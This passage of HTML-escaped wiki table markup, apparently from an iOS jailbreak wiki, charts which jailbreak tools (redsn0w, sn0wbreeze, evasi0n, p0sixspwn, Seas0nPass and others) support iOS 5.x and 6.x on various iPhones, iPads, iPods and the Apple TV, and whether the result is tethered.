| colspan=&amp;quot;2&amp;quot; | [[unthredeh4il]]&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; {{yes}}&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; rowspan=&amp;quot;2&amp;quot; {{yes}}&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; rowspan=&amp;quot;2&amp;quot; {{yes}}&lt;br /&gt;
|-&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; | [[unthredera1n]]&lt;br /&gt;
|-&lt;br /&gt;
| rowspan=&amp;quot;8&amp;quot; | 5.0.1&lt;br /&gt;
| [[Absinthe]]&lt;br /&gt;
| class=&amp;quot;rborderplz&amp;quot; | 0.1-0.4&lt;br /&gt;
| {{no}}&lt;br /&gt;
| {{yes}}&lt;br /&gt;
| rowspan=&amp;quot;8&amp;quot; {{n/a}}&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; {{no}}&lt;br /&gt;
| {{yes}}&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; {{no}}&lt;br /&gt;
|-&lt;br /&gt;
| [[Ac1dSn0w]]&lt;br /&gt;
| Beta 1-Beta 2&lt;br /&gt;
| {{partial|Tethered}}&lt;br /&gt;
| {{no}}&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; {{partial|Tethered}}&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; {{no}}&lt;br /&gt;
| {{partial|Tethered}}&lt;br /&gt;
|-&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; | [[ipwndfu]]&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; {{no}}&lt;br /&gt;
| {{yes}}&lt;br /&gt;
| colspan=&amp;quot;4&amp;quot; {{no}}&lt;br /&gt;
|-&lt;br /&gt;
| [[PwnageTool]]&lt;br /&gt;
| class=&amp;quot;rborderplz&amp;quot; | 5.0.1&lt;br /&gt;
| {{yes}}&lt;br /&gt;
| {{no}}&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; {{yes}}&lt;br /&gt;
| {{no}}&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; {{yes}}&lt;br /&gt;
|-&lt;br /&gt;
| [[redsn0w]]&lt;br /&gt;
| class=&amp;quot;rborderplz&amp;quot; | 0.9.10b4-0.9.11b4&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; {{yes}}&lt;br /&gt;
| colspan=&amp;quot;5&amp;quot; {{yes}}&lt;br /&gt;
|-&lt;br /&gt;
| [[sn0wbreeze]]&lt;br /&gt;
| class=&amp;quot;rborderplz&amp;quot; | 2.8b11-2.9.14&lt;br /&gt;
| rowspan=&amp;quot;3&amp;quot; {{yes}}&lt;br /&gt;
| rowspan=&amp;quot;3&amp;quot; {{no}}&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; rowspan=&amp;quot;3&amp;quot; {{yes}}&lt;br /&gt;
| rowspan=&amp;quot;3&amp;quot; {{no}}&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; rowspan=&amp;quot;3&amp;quot; {{yes}}&lt;br /&gt;
|-&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; | [[unthredeh4il]]&lt;br /&gt;
|-&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; | [[unthredera1n]]&lt;br /&gt;
|-&lt;br /&gt;
| rowspan=&amp;quot;5&amp;quot; | 5.1&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; | [[ipwndfu]]&lt;br /&gt;
| colspan=&amp;quot;3&amp;quot; {{no}}&lt;br /&gt;
| {{yes}}&lt;br /&gt;
| colspan=&amp;quot;4&amp;quot; {{no}}&lt;br /&gt;
|-&lt;br /&gt;
| [[redsn0w]]&lt;br /&gt;
| class=&amp;quot;rborderplz&amp;quot; | 0.9.10b6-0.9.11b4&lt;br /&gt;
| rowspan=&amp;quot;4&amp;quot; {{yes}}&lt;br /&gt;
| rowspan=&amp;quot;4&amp;quot; colspan=&amp;quot;2&amp;quot; {{no}}&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; rowspan=&amp;quot;2&amp;quot; {{partial|Tethered}}&lt;br /&gt;
| rowspan=&amp;quot;4&amp;quot; {{no}}&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; rowspan=&amp;quot;2&amp;quot; {{partial|Tethered}}&lt;br /&gt;
|-&lt;br /&gt;
| [[sn0wbreeze]]&lt;br /&gt;
| class=&amp;quot;rborderplz&amp;quot; | 2.9.2-2.9.3&lt;br /&gt;
|-&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; | [[unthredeh4il]]&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; rowspan=&amp;quot;2&amp;quot; {{yes}}&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; rowspan=&amp;quot;2&amp;quot; {{yes}}&lt;br /&gt;
|-&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; | [[unthredera1n]]&lt;br /&gt;
|-&lt;br /&gt;
| rowspan=&amp;quot;8&amp;quot; | 5.1.1&lt;br /&gt;
| [[Absinthe]]&lt;br /&gt;
| class=&amp;quot;rborderplz&amp;quot; | 2.0-2.0.4&lt;br /&gt;
| colspan=&amp;quot;8&amp;quot; rowspan=&amp;quot;2&amp;quot; {{yes}}&lt;br /&gt;
|-&lt;br /&gt;
| [[cinject]]&lt;br /&gt;
| class=&amp;quot;rborderplz&amp;quot; | 0.5.3-0.5.4&lt;br /&gt;
|-&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; | [[ipwndfu]]&lt;br /&gt;
| colspan=&amp;quot;3&amp;quot; {{no}}&lt;br /&gt;
| {{yes}}&lt;br /&gt;
| colspan=&amp;quot;4&amp;quot; {{no}}&lt;br /&gt;
|-&lt;br /&gt;
| [[PwnageTool]]&lt;br /&gt;
| class=&amp;quot;rborderplz&amp;quot; | 5.1.1&lt;br /&gt;
| {{yes}}&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; {{no}}&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; {{yes}}&lt;br /&gt;
| colspan=&amp;quot;3&amp;quot; {{no}}&lt;br /&gt;
|-&lt;br /&gt;
| [[redsn0w]]&lt;br /&gt;
| class=&amp;quot;rborderplz&amp;quot; | 0.9.12b1-0.9.14b2&lt;br /&gt;
| colspan=&amp;quot;8&amp;quot; {{yes}}&lt;br /&gt;
|-&lt;br /&gt;
| [[sn0wbreeze]]&lt;br /&gt;
| class=&amp;quot;rborderplz&amp;quot; | 2.9.6-2.9.14&lt;br /&gt;
| rowspan=&amp;quot;3&amp;quot; {{yes}}&lt;br /&gt;
| rowspan=&amp;quot;3&amp;quot; colspan=&amp;quot;2&amp;quot; {{no}}&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; rowspan=&amp;quot;3&amp;quot; {{yes}}&lt;br /&gt;
| rowspan=&amp;quot;3&amp;quot; {{no}}&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; rowspan=&amp;quot;3&amp;quot; {{yes}}&lt;br /&gt;
|-&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; | [[unthredeh4il]]&lt;br /&gt;
|-&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; | [[unthredera1n]]&lt;br /&gt;
|}&lt;br /&gt;
&amp;lt;references group=&amp;quot;5.x_i&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;ref name=&amp;quot;bundle&amp;quot;&amp;gt;A firmware bundle for this version must be manually added.&amp;lt;/ref&amp;gt;&lt;br /&gt;
&amp;lt;/references&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=====Apple TV=====&lt;br /&gt;
'''Note''': &amp;quot;Marketing Version&amp;quot; is the version that the Apple TV reports in its &amp;quot;About&amp;quot; screen.&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
|-&lt;br /&gt;
! rowspan=&amp;quot;2&amp;quot; | Marketing Version&lt;br /&gt;
! rowspan=&amp;quot;2&amp;quot; | iOS Version&lt;br /&gt;
! rowspan=&amp;quot;2&amp;quot; | Jailbreak Tool&lt;br /&gt;
! rowspan=&amp;quot;2&amp;quot; | Tool Version&lt;br /&gt;
! Device&lt;br /&gt;
|-&lt;br /&gt;
! [[K66AP|Apple TV (2nd generation)]]&lt;br /&gt;
|-&lt;br /&gt;
| rowspan=&amp;quot;3&amp;quot; | 4.4&lt;br /&gt;
| rowspan=&amp;quot;3&amp;quot; | 5.0&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; | [[Seas0nPass]]&lt;br /&gt;
| class=&amp;quot;rborderplz&amp;quot; | 0.7.9.??? (Mac)&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; {{partial|Tethered}}&lt;br /&gt;
|-&lt;br /&gt;
| class=&amp;quot;rborderplz&amp;quot; | 0.3.37.???? (Windows)&lt;br /&gt;
|-&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; | [[unthredeh4il]]&lt;br /&gt;
| {{yes}}&lt;br /&gt;
|-&lt;br /&gt;
| rowspan=&amp;quot;3&amp;quot; | 4.4.1&lt;br /&gt;
| rowspan=&amp;quot;3&amp;quot; | 5.0&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; | [[Seas0nPass]]&lt;br /&gt;
| class=&amp;quot;rborderplz&amp;quot; | 0.7.9.210 (Mac)&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; {{partial|Tethered}}&lt;br /&gt;
|-&lt;br /&gt;
| class=&amp;quot;rborderplz&amp;quot; | 0.3.37.???? (Windows)&lt;br /&gt;
|-&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; | [[unthredeh4il]]&lt;br /&gt;
| {{yes}}&lt;br /&gt;
|-&lt;br /&gt;
| rowspan=&amp;quot;3&amp;quot; | 4.4.2&lt;br /&gt;
| rowspan=&amp;quot;3&amp;quot; | 5.0&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; | [[Seas0nPass]]&lt;br /&gt;
| class=&amp;quot;rborderplz&amp;quot; | 0.7.9.230 (Mac)&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; {{partial|Tethered}}&lt;br /&gt;
|-&lt;br /&gt;
| class=&amp;quot;rborderplz&amp;quot; | 0.3.42.3335 (Windows)&lt;br /&gt;
|-&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; | [[unthredeh4il]]&lt;br /&gt;
| {{yes}}&lt;br /&gt;
|-&lt;br /&gt;
| rowspan=&amp;quot;3&amp;quot; | 4.4.3&lt;br /&gt;
| rowspan=&amp;quot;3&amp;quot; | 5.0.1&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; | [[Seas0nPass]]&lt;br /&gt;
| class=&amp;quot;rborderplz&amp;quot; | 0.7.9.270 (Mac)&lt;br /&gt;
| rowspan=&amp;quot;3&amp;quot; {{yes}}&lt;br /&gt;
|-&lt;br /&gt;
| class=&amp;quot;rborderplz&amp;quot; | 0.3.44.???? (Windows)&lt;br /&gt;
|-&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; | [[unthredeh4il]]&lt;br /&gt;
|-&lt;br /&gt;
| rowspan=&amp;quot;3&amp;quot; | 4.4.4&lt;br /&gt;
| rowspan=&amp;quot;3&amp;quot; | 5.0.1&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; | [[Seas0nPass]]&lt;br /&gt;
| class=&amp;quot;rborderplz&amp;quot; | 0.7.9.290 (Mac)&lt;br /&gt;
| rowspan=&amp;quot;3&amp;quot; {{yes}}&lt;br /&gt;
|-&lt;br /&gt;
| class=&amp;quot;rborderplz&amp;quot; | 0.3.45.4035 (Windows)&lt;br /&gt;
|-&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; | [[unthredeh4il]]&lt;br /&gt;
|-&lt;br /&gt;
| rowspan=&amp;quot;3&amp;quot; | 5.0&lt;br /&gt;
| rowspan=&amp;quot;3&amp;quot; | 5.1&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; | [[Seas0nPass]]&lt;br /&gt;
| class=&amp;quot;rborderplz&amp;quot; | 0.8.3.470 (Mac)&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; {{partial|Tethered}}&lt;br /&gt;
|-&lt;br /&gt;
| class=&amp;quot;rborderplz&amp;quot; | 0.8.3.5592 (Windows)&lt;br /&gt;
|-&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; | [[unthredeh4il]]&lt;br /&gt;
| {{yes}}&lt;br /&gt;
|-&lt;br /&gt;
| rowspan=&amp;quot;4&amp;quot; | 5.0.1&lt;br /&gt;
| rowspan=&amp;quot;4&amp;quot; | 5.1.1&lt;br /&gt;
| [[PwnageTool]]&lt;br /&gt;
| class=&amp;quot;rborderplz&amp;quot; | 5.1.1&amp;lt;ref group=&amp;quot;5.x_atv&amp;quot; name=&amp;quot;nogui&amp;quot; /&amp;gt;&lt;br /&gt;
| {{partial|Tethered}}&lt;br /&gt;
|-&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; | [[Seas0nPass]]&lt;br /&gt;
| class=&amp;quot;rborderplz&amp;quot; | 0.8.4.518 (Mac)&lt;br /&gt;
| rowspan=&amp;quot;3&amp;quot; {{yes}}&lt;br /&gt;
|-&lt;br /&gt;
| class=&amp;quot;rborderplz&amp;quot; | 0.8.4.6306 (Windows)&lt;br /&gt;
|-&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; | [[unthredeh4il]]&lt;br /&gt;
|-&lt;br /&gt;
| rowspan=&amp;quot;3&amp;quot; | 5.0.2&lt;br /&gt;
| rowspan=&amp;quot;3&amp;quot; | 5.1.1&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; | [[Seas0nPass]]&lt;br /&gt;
| class=&amp;quot;rborderplz&amp;quot; | 0.8.6.565 (Mac)&lt;br /&gt;
| rowspan=&amp;quot;3&amp;quot; {{yes}}&lt;br /&gt;
|-&lt;br /&gt;
| class=&amp;quot;rborderplz&amp;quot; | 0.8.6.7558 (Windows)&lt;br /&gt;
|-&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; | [[unthredeh4il]]&lt;br /&gt;
|}&lt;br /&gt;
&amp;lt;references group=&amp;quot;5.x_atv&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;ref name=&amp;quot;nogui&amp;quot;&amp;gt;No package management GUI.&amp;lt;/ref&amp;gt;&lt;br /&gt;
&amp;lt;/references&amp;gt;&lt;br /&gt;
&lt;br /&gt;
====6.x====&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
|-&lt;br /&gt;
! rowspan=&amp;quot;2&amp;quot; | iOS&lt;br /&gt;
! rowspan=&amp;quot;2&amp;quot; | Jailbreak Tool&lt;br /&gt;
! rowspan=&amp;quot;2&amp;quot; | Tool Version&lt;br /&gt;
! colspan=&amp;quot;10&amp;quot; | Device&lt;br /&gt;
|-&lt;br /&gt;
! [[iPad 2]]&lt;br /&gt;
! [[iPad (3rd generation)]]&lt;br /&gt;
! [[iPad (4th generation)]]&lt;br /&gt;
! [[iPad mini]]&lt;br /&gt;
! [[N88AP|iPhone 3GS]]&lt;br /&gt;
! [[iPhone 4]]&lt;br /&gt;
! [[N94AP|iPhone 4S]]&lt;br /&gt;
! [[iPhone 5]]&lt;br /&gt;
! [[iPod touch (4th generation)]]&lt;br /&gt;
! [[iPod touch (5th generation)]]&lt;br /&gt;
|-&lt;br /&gt;
| rowspan=&amp;quot;4&amp;quot; | 6.0&lt;br /&gt;
| [[evasi0n]]&lt;br /&gt;
| class=&amp;quot;rborderplz&amp;quot; | 1.0-1.5.3&lt;br /&gt;
| colspan=&amp;quot;10&amp;quot; {{yes}}&lt;br /&gt;
|-&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; | [[ipwndfu]]&lt;br /&gt;
| colspan=&amp;quot;4&amp;quot; rowspan=&amp;quot;3&amp;quot; {{no}}&lt;br /&gt;
| {{yes}}&lt;br /&gt;
| colspan=&amp;quot;5&amp;quot; {{no}}&lt;br /&gt;
|-&lt;br /&gt;
| [[redsn0w]]&lt;br /&gt;
| class=&amp;quot;rborderplz&amp;quot; | 0.9.15b1&amp;lt;ref group=&amp;quot;6.x_i&amp;quot; name=&amp;quot;upgradeable-evasi0n&amp;quot; /&amp;gt;-0.9.15b3&amp;lt;ref group=&amp;quot;6.x_i&amp;quot; name=&amp;quot;upgradeable-evasi0n&amp;quot; /&amp;gt;&lt;br /&gt;
| {{partial|Yes&amp;lt;ref group=&amp;quot;6.x_i&amp;quot; name=&amp;quot;upgradeable-evasi0n&amp;quot; /&amp;gt;}}&lt;br /&gt;
| {{partial|Tethered}}&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; rowspan=&amp;quot;2&amp;quot; {{no}}&lt;br /&gt;
| {{partial|Tethered}}&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; {{no}}&lt;br /&gt;
|-&lt;br /&gt;
| [[sn0wbreeze]]&lt;br /&gt;
| class=&amp;quot;rborderplz&amp;quot; | 2.9.8-2.9.14&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; {{yes}}&lt;br /&gt;
| {{yes}}&lt;br /&gt;
|-&lt;br /&gt;
| rowspan=&amp;quot;4&amp;quot; | 6.0.1&lt;br /&gt;
| [[evasi0n]]&lt;br /&gt;
| class=&amp;quot;rborderplz&amp;quot; | 1.0-1.5.3&lt;br /&gt;
| colspan=&amp;quot;10&amp;quot; {{yes}}&lt;br /&gt;
|-&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; | [[ipwndfu]]&lt;br /&gt;
| colspan=&amp;quot;4&amp;quot; rowspan=&amp;quot;3&amp;quot; {{no}}&lt;br /&gt;
| {{yes}}&lt;br /&gt;
| colspan=&amp;quot;5&amp;quot; {{no}}&lt;br /&gt;
|-&lt;br /&gt;
| [[redsn0w]]&lt;br /&gt;
| class=&amp;quot;rborderplz&amp;quot; | 0.9.15b1&amp;lt;ref group=&amp;quot;6.x_i&amp;quot; name=&amp;quot;ipsw-upgradeable-evasi0n&amp;quot; /&amp;gt;-0.9.15b3&amp;lt;ref group=&amp;quot;6.x_i&amp;quot; name=&amp;quot;ipsw-upgradeable-evasi0n&amp;quot; /&amp;gt;&lt;br /&gt;
| {{partial|Yes&amp;lt;ref group=&amp;quot;6.x_i&amp;quot; name=&amp;quot;ipsw-upgradeable-evasi0n&amp;quot; /&amp;gt;}}&lt;br /&gt;
| {{partial|Tethered&amp;lt;ref group=&amp;quot;6.x_i&amp;quot; name=&amp;quot;ipsw-upgradeable-evasi0n&amp;quot; /&amp;gt;}}&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; rowspan=&amp;quot;2&amp;quot; {{no}}&lt;br /&gt;
| {{partial|Tethered&amp;lt;ref group=&amp;quot;6.x_i&amp;quot; name=&amp;quot;ipsw-upgradeable-evasi0n&amp;quot; /&amp;gt;}}&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; {{no}}&lt;br /&gt;
|-&lt;br /&gt;
| [[sn0wbreeze]]&lt;br /&gt;
| class=&amp;quot;rborderplz&amp;quot; | 2.9.8-2.9.14&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; {{yes}}&lt;br /&gt;
| {{yes}}&lt;br /&gt;
|-&lt;br /&gt;
| 6.0.2&lt;br /&gt;
| [[evasi0n]]&lt;br /&gt;
| class=&amp;quot;rborderplz&amp;quot; | 1.0-1.5.3&lt;br /&gt;
| colspan=&amp;quot;3&amp;quot; {{n/a}}&lt;br /&gt;
| {{yes}}&lt;br /&gt;
| colspan=&amp;quot;3&amp;quot; {{n/a}}&lt;br /&gt;
| {{yes}}&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; {{n/a}}&lt;br /&gt;
|-&lt;br /&gt;
| rowspan=&amp;quot;4&amp;quot; | 6.1&lt;br /&gt;
| [[evasi0n]]&lt;br /&gt;
| class=&amp;quot;rborderplz&amp;quot; | 1.0-1.5.3&lt;br /&gt;
| colspan=&amp;quot;10&amp;quot; {{yes}}&lt;br /&gt;
|-&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; | [[ipwndfu]]&lt;br /&gt;
| colspan=&amp;quot;4&amp;quot; rowspan=&amp;quot;3&amp;quot; {{no}}&lt;br /&gt;
| {{yes}}&lt;br /&gt;
| colspan=&amp;quot;5&amp;quot; {{no}}&lt;br /&gt;
|-&lt;br /&gt;
| [[redsn0w]]&lt;br /&gt;
| class=&amp;quot;rborderplz&amp;quot; | 0.9.15b1&amp;lt;ref group=&amp;quot;6.x_i&amp;quot; name=&amp;quot;ipsw-upgradeable-evasi0n&amp;quot; /&amp;gt;-0.9.15b3&amp;lt;ref group=&amp;quot;6.x_i&amp;quot; name=&amp;quot;ipsw-upgradeable-evasi0n&amp;quot; /&amp;gt;&lt;br /&gt;
| {{partial|Yes&amp;lt;ref group=&amp;quot;6.x_i&amp;quot; name=&amp;quot;ipsw-upgradeable-evasi0n&amp;quot; /&amp;gt;}}&lt;br /&gt;
| {{partial|Tethered&amp;lt;ref group=&amp;quot;6.x_i&amp;quot; name=&amp;quot;ipsw-upgradeable-evasi0n&amp;quot; /&amp;gt;}}&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; rowspan=&amp;quot;2&amp;quot; {{no}}&lt;br /&gt;
| {{partial|Tethered&amp;lt;ref group=&amp;quot;6.x_i&amp;quot; name=&amp;quot;ipsw-upgradeable-evasi0n&amp;quot; /&amp;gt;}}&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; {{no}}&lt;br /&gt;
|-&lt;br /&gt;
| [[sn0wbreeze]]&lt;br /&gt;
| class=&amp;quot;rborderplz&amp;quot; | 2.9.8-2.9.14&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; {{yes}}&lt;br /&gt;
| {{yes}}&lt;br /&gt;
|-&lt;br /&gt;
| 6.1.1&lt;br /&gt;
| [[evasi0n]]&lt;br /&gt;
| class=&amp;quot;rborderplz&amp;quot; | 1.3-1.5.3&lt;br /&gt;
| colspan=&amp;quot;6&amp;quot; {{n/a}}&lt;br /&gt;
| {{yes}}&lt;br /&gt;
| colspan=&amp;quot;3&amp;quot; {{n/a}}&lt;br /&gt;
|-&lt;br /&gt;
| rowspan=&amp;quot;4&amp;quot; | 6.1.2&lt;br /&gt;
| [[evasi0n]]&lt;br /&gt;
| class=&amp;quot;rborderplz&amp;quot; | 1.4-1.5.3&lt;br /&gt;
| colspan=&amp;quot;10&amp;quot; {{yes}}&lt;br /&gt;
|-&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; | [[ipwndfu]]&lt;br /&gt;
| colspan=&amp;quot;4&amp;quot; rowspan=&amp;quot;3&amp;quot; {{no}}&lt;br /&gt;
| {{yes}}&lt;br /&gt;
| colspan=&amp;quot;5&amp;quot; {{no}}&lt;br /&gt;
|-&lt;br /&gt;
| [[redsn0w]]&lt;br /&gt;
| class=&amp;quot;rborderplz&amp;quot; | 0.9.15b1&amp;lt;ref group=&amp;quot;6.x_i&amp;quot; name=&amp;quot;ipsw-upgradeable-evasi0n&amp;quot; /&amp;gt;-0.9.15b3&amp;lt;ref group=&amp;quot;6.x_i&amp;quot; name=&amp;quot;ipsw-upgradeable-evasi0n&amp;quot; /&amp;gt;&lt;br /&gt;
| {{partial|Yes&amp;lt;ref group=&amp;quot;6.x_i&amp;quot; name=&amp;quot;ipsw-upgradeable-evasi0n&amp;quot; /&amp;gt;}}&lt;br /&gt;
| {{partial|Tethered&amp;lt;ref group=&amp;quot;6.x_i&amp;quot; name=&amp;quot;ipsw-upgradeable-evasi0n&amp;quot; /&amp;gt;}}&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; rowspan=&amp;quot;2&amp;quot; {{no}}&lt;br /&gt;
| {{partial|Tethered&amp;lt;ref group=&amp;quot;6.x_i&amp;quot; name=&amp;quot;ipsw-upgradeable-evasi0n&amp;quot; /&amp;gt;}}&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; {{no}}&lt;br /&gt;
|-&lt;br /&gt;
| [[sn0wbreeze]]&lt;br /&gt;
| class=&amp;quot;rborderplz&amp;quot; | 2.9.10-2.9.14&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; {{yes}}&lt;br /&gt;
| {{yes}}&lt;br /&gt;
|-&lt;br /&gt;
| rowspan=&amp;quot;4&amp;quot; | 6.1.3&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; | [[ipwndfu]]&lt;br /&gt;
| colspan=&amp;quot;4&amp;quot; {{no}}&lt;br /&gt;
| {{yes}}&lt;br /&gt;
| colspan=&amp;quot;5&amp;quot; {{no}}&lt;br /&gt;
|-&lt;br /&gt;
| [[p0sixspwn]]&lt;br /&gt;
| class=&amp;quot;rborderplz&amp;quot; | 1.0-1.0.8&lt;br /&gt;
| colspan=&amp;quot;10&amp;quot; {{yes}}&lt;br /&gt;
|-&lt;br /&gt;
| [[redsn0w]]&lt;br /&gt;
| class=&amp;quot;rborderplz&amp;quot; | 0.9.15b1&amp;lt;ref group=&amp;quot;6.x_i&amp;quot; name=&amp;quot;ipsw-upgradeable-p0sixspwn&amp;quot; /&amp;gt;-0.9.15b3&amp;lt;ref group=&amp;quot;6.x_i&amp;quot; name=&amp;quot;ipsw-upgradeable-p0sixspwn&amp;quot; /&amp;gt;&lt;br /&gt;
| colspan=&amp;quot;4&amp;quot; rowspan=&amp;quot;2&amp;quot; {{no}}&lt;br /&gt;
| {{partial|Yes&amp;lt;ref group=&amp;quot;6.x_i&amp;quot; name=&amp;quot;ipsw-upgradeable-p0sixspwn&amp;quot; /&amp;gt;}}&lt;br /&gt;
| {{partial|Tethered&amp;lt;ref group=&amp;quot;6.x_i&amp;quot; name=&amp;quot;ipsw-upgradeable-p0sixspwn&amp;quot; /&amp;gt;}}&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; rowspan=&amp;quot;2&amp;quot; {{no}}&lt;br /&gt;
| {{partial|Tethered&amp;lt;ref group=&amp;quot;6.x_i&amp;quot; name=&amp;quot;ipsw-upgradeable-p0sixspwn&amp;quot; /&amp;gt;}}&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; {{no}}&lt;br /&gt;
|-&lt;br /&gt;
| [[sn0wbreeze]]&lt;br /&gt;
| class=&amp;quot;rborderplz&amp;quot; | 2.9.14&amp;lt;ref group=&amp;quot;6.x_i&amp;quot; name=&amp;quot;upgradeable-p0sixspwn&amp;quot; /&amp;gt;&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; {{partial|Tethered&amp;lt;ref group=&amp;quot;6.x_i&amp;quot; name=&amp;quot;upgradeable-p0sixspwn&amp;quot; /&amp;gt;}}&lt;br /&gt;
| {{partial|Tethered&amp;lt;ref group=&amp;quot;6.x_i&amp;quot; name=&amp;quot;upgradeable-p0sixspwn&amp;quot; /&amp;gt;}}&lt;br /&gt;
|-&lt;br /&gt;
| 6.1.4&lt;br /&gt;
| [[p0sixspwn]]&lt;br /&gt;
| class=&amp;quot;rborderplz&amp;quot; | 1.0-1.0.8&lt;br /&gt;
| colspan=&amp;quot;7&amp;quot; {{n/a}}&lt;br /&gt;
| {{yes}}&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; {{n/a}}&lt;br /&gt;
|-&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; | 6.1.5&lt;br /&gt;
| [[p0sixspwn]]&lt;br /&gt;
| class=&amp;quot;rborderplz&amp;quot; | 1.0-1.0.8&lt;br /&gt;
| colspan=&amp;quot;8&amp;quot; rowspan=&amp;quot;2&amp;quot; {{n/a}}&lt;br /&gt;
| {{yes}}&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; {{n/a}}&lt;br /&gt;
|-&lt;br /&gt;
| [[redsn0w]]&lt;br /&gt;
| class=&amp;quot;rborderplz&amp;quot; | 0.9.15b1&amp;lt;ref group=&amp;quot;6.x_i&amp;quot; name=&amp;quot;ipsw-upgradeable-p0sixspwn&amp;quot; /&amp;gt;-0.9.15b3&amp;lt;ref group=&amp;quot;6.x_i&amp;quot; name=&amp;quot;ipsw-upgradeable-p0sixspwn&amp;quot; /&amp;gt;&lt;br /&gt;
| {{partial|Tethered&amp;lt;ref group=&amp;quot;6.x_i&amp;quot; name=&amp;quot;ipsw-upgradeable-p0sixspwn&amp;quot; /&amp;gt;|class=rborderplz}}&lt;br /&gt;
|-&lt;br /&gt;
| rowspan=&amp;quot;3&amp;quot; | 6.1.6&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; | [[ipwndfu]]&lt;br /&gt;
| rowspan=&amp;quot;3&amp;quot; colspan=&amp;quot;4&amp;quot; {{n/a}}&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; {{yes}}&lt;br /&gt;
| rowspan=&amp;quot;3&amp;quot; colspan=&amp;quot;3&amp;quot; {{n/a}}&lt;br /&gt;
| {{no}}&lt;br /&gt;
| rowspan=&amp;quot;3&amp;quot; {{n/a}}&lt;br /&gt;
|-&lt;br /&gt;
| [[p0sixspwn]]&lt;br /&gt;
| class=&amp;quot;rborderplz&amp;quot; | 1.0.8&lt;br /&gt;
| {{yes}}&lt;br /&gt;
|-&lt;br /&gt;
| [[redsn0w]]&lt;br /&gt;
| class=&amp;quot;rborderplz&amp;quot; | 0.9.15b1&amp;lt;ref group=&amp;quot;6.x_i&amp;quot; name=&amp;quot;ipsw-upgradeable-p0sixspwn&amp;quot; /&amp;gt;-0.9.15b3&amp;lt;ref group=&amp;quot;6.x_i&amp;quot; name=&amp;quot;ipsw-upgradeable-p0sixspwn&amp;quot; /&amp;gt;&lt;br /&gt;
